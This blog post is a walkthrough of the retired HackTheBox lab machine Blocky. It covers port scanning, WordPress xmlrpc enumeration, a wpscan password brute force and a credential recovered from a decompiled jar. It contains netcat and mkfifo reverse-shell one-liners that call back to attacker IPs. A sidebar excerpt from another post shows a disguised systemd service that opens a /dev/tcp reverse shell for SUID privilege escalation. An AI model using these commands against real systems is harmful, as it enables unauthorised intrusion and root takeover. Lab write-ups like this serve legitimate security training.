Skip to main content

HacktheBox - Blocky - Retired - Update

HacktheBox - Retired - Blocky - Update


Recon

I'm using threader3000 to do my recon scan. IT first does an up/down scan on all TCP ports then suggests a nmap scan based on the results of the first scan. It automatically saves the output from nmap to an XML for you.



I then convert the XML to HTML to make it easier to read.


xsltproc ./blocky.htb/blocky.htb.xml -o blocky.html







So it looks like a linux box


4 ports are open


Port 21 FTP         Proftpd 1.3.5

Port 22 SSH         OpenSSH 7.2p2

Port 80 HTTP Apache 2.4.18

Port 25565 minecraft         1.11.2


Interesting seeing minecraft on there… let's start with our normal enumeration.


Port 21 let's see if it allows anonymous connections.



Nope.


We'll skip over ssh for right now, that usually is not the path on a HacktheBox machine.


What is it serving on port 80?





Scrolling down we see a link that says login.


Don't mind if we do. Let's check it out.


A wordpress login portal...


Poking around in the source code we see a couple bits of info that might come in handy


Wordpress 4.8  and the name of the theme being used "twentyseventeen"



Googling around for wordpress 4.8 exploits I came across this blog


https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32


Which talks about exploiting the xmlrpc.php API.


First let's make sure the API is exposed.






It looks like it is, in the blog they use burp suite to capture this request, change it to POST and get  a list of the modules this site uses. So we will try that now.


Here is what our captured request looks like loaded up in repeater.


If we fire that over to blocky


We get this as a response, which is exactly what we saw in firefox.




So if we change it to POST and not GET


 


It likes the request, we get 200 but it doesn't know what we want it to do since we didn't request it to do anything. In the blog we found they say inserting this will get back the list of modules.



<methodCall>

<methodName>system.listMethods</methodName>

<params></params>

</methodCall>


So now our request looks like this.


And we get this back from the server







Here is a cleaned up version of the methods allowed


system.multicall 
    system.listMethods 
    system.getCapabilities 
    demo.addTwoNumbers 
    demo.sayHello 
    pingback.extensions.getPingbacks 
    pingback.ping 
    mt.publishPost 
    mt.getTrackbackPings 
    mt.supportedTextFilters 
    mt.supportedMethods 
    mt.setPostCategories 
    mt.getPostCategories 
    mt.getRecentPostTitles 
    mt.getCategoryList 
    metaWeblog.getUsersBlogs 
    metaWeblog.deletePost 
    metaWeblog.newMediaObject 
    metaWeblog.getCategories 
    metaWeblog.getRecentPosts 
    metaWeblog.getPost 
    metaWeblog.editPost 
    metaWeblog.newPost 
    blogger.deletePost 
    blogger.editPost 
    blogger.newPost 
    blogger.getRecentPosts 
    blogger.getPost 
    blogger.getUserInfo 
    blogger.getUsersBlogs 
    wp.restoreRevision 
    wp.getRevisions 
    wp.getPostTypes 
    wp.getPostType 
    wp.getPostFormats 
    wp.getMediaLibrary 
    wp.getMediaItem 
    wp.getCommentStatusList 
    wp.newComment 
    wp.editComment 
    wp.deleteComment 
    wp.getComments 
    wp.getComment 
    wp.setOptions 
    wp.getOptions 
    wp.getPageTemplates 
    wp.getPageStatusList 
    wp.getPostStatusList 
    wp.getCommentCount 
    wp.deleteFile 
    wp.uploadFile 
    wp.suggestCategories 
    wp.deleteCategory 
    wp.newCategory 
    wp.getTags 
    wp.getCategories 
    wp.getAuthors 
    wp.getPageList 
    wp.editPage 
    wp.deletePage 
    wp.newPage 
    wp.getPages 
    wp.getPage 
    wp.editProfile 
    wp.getProfile 
    wp.getUsers 
    wp.getUser 
    wp.getTaxonomies 
    wp.getTaxonomy 
    wp.getTerms 
    wp.getTerm 
    wp.deleteTerm 
    wp.editTerm 
    wp.newTerm 
    wp.getPosts 
    wp.getPost 
    wp.deletePost 
    wp.editPost 
    wp.newPost 
    wp.getUsersBlogs  




That is a lot of things we could potentially use this api to do.





Googling around a bit more I stumbled upon a tool name wpscan which comes with kali.


Running its defaults does show some interesting results.


it shows xmlrpc exploits we found earlier, but I also found that you could try to enumerate users using 


--enumerate u



Looks like user name is notch


Which we would have found earlier if we were paying closer attention.






You can also use wpscan to bruteforce the password of users.



wpscan --url http://blocky.htb --passwords /usr/share/wordlists/rockyou.txt --usernames notch -t 100


I just left this running in the background.



Exploit


While running drib against blocky it came back with an interesting folder.



http://blocky.htb/plugins/


Which included this BlockyCore.jar file.  I downloaded a copy of it to my kali box


Nothing I could find built into Kali would open this file, so I googled around and found a tool named jd-gui


I used apt-get to install


sudo apt-get install jd-gui




Then opened the it with jd-gui and was kind of dumb struck to see this.



Is that really the root password??



8YsqfCTnvxAUeduzjNSXe22


One way to find out is using SSH which this box has.. I tried logging in as root with the password.



Nope… but what about that other username we found notch?


We have our foothold.


And we can get our user flag now


Let's work on escalating to root now.



Well when I first get a user account with the credentials on a linux box the first thing I always check is their sudo rights.



OMG, notch can run anything as root.


Should be pretty easy to get our root flag then


sudo cat /root/root.txt


But wouldn't we really rather have a root shell?


Netcat should make this trivial.


First let's setup our listener


Nc -lnvp 5555


Then we just use netcat to connect back

sudo nc 10.10.14.19 5566 -e /bin/bash




No -e option.. So much for being super easy..


Next I tried mkfifo to get my shell


sudo rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.19 5555 >/tmp/f



But when it connected back it was still as notch.


Dang….


Wait, are we overthinking this can't we just SU as root?


sudo su root









Labels:

Comments

Post a Comment

Popular posts from this blog

RingZero CTF - Forensics - Who am I part 2

RingZero CTF - Forensics -  Who am I part 2 Objective: I'm the proud owner of this website. Can you verify that? Solution: Well it took me a bit to figure this one out. I tried looking at the whois records for ringzer0ctf.com I tired looking at the DNS records for the site. I even looked in the Certificate for the site. Then I thought a little be more about the question. It's not asking how I can verify who own the site. It wants me to verify the owner themselves. Luckily at the bottom the page we see who is listed as on the twittter feeds @ringzer0CTF and @ MrUnik0d3r lets check if we can find the PGP for MrUniK0d3r online. I googled PGP and MrUn1k0d3r The very first result is his PGP  keybase.txt with his PGP at the bottom of the file is the flag FLAG-7A7i0V2438xL95z2X2Z321p30D8T433Z
Post a Comment
Read more

Abusing systemctl SUID for reverse shell

Today I came across a box that had the SUID set for systemctl connected as the apache user www-data I was able to get a root reverse shell. This is to document how to use this for privilege escalation. I used a bit from this blog https://carvesystems.com/news/contest-exploiting-misconfigured-sudo/ and a bit from here too https://hosakacorp.net/p/systemd-user.html Step1. Create a fake service I named my LegitService.service I placed it in the /tmp directory on the server. [Unit] UNIT=LegitService Description=Black magic happening, avert your eyes [Service] RemainAfterExit=yes Type=simple ExecStart=/bin/bash -c "exec 5<>/dev/tcp/10.2.21.243/5555; cat <&5 | while read line; do $line 2>&5 >&5; done" [Install] WantedBy=default.target Then in order to add this to a place we can use systemctl to call from I created a link from /tmp, since I didn't have permission to put the file in the normal systemd folders systemctl link /tmp/LegitService.service The
Post a Comment
Read more

HacktheBox - Retired - Frolic

HacktheBox - Retired - Frolic Recon Let's start out with a threader3000 scan Some interesting results here Port 22 and 445 aren't uncommon… but 1880 and 9999 are.. Let's let nmap run through these ports  Option Selection: 1 nmap -p22,445,1880,9999 -sV -sC -T4 -Pn -oA 10.10.10.111 10.10.10.111 Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower. Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-05 16:17 EDT Nmap scan report for 10.10.10.111 Host is up (0.060s latency). PORT     STATE SERVICE     VERSION 22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: |   2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) |   256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) |_  256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) 445/tcp  open  netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1880/tcp open  http        Node.js (Express middlewar
Post a Comment
Read more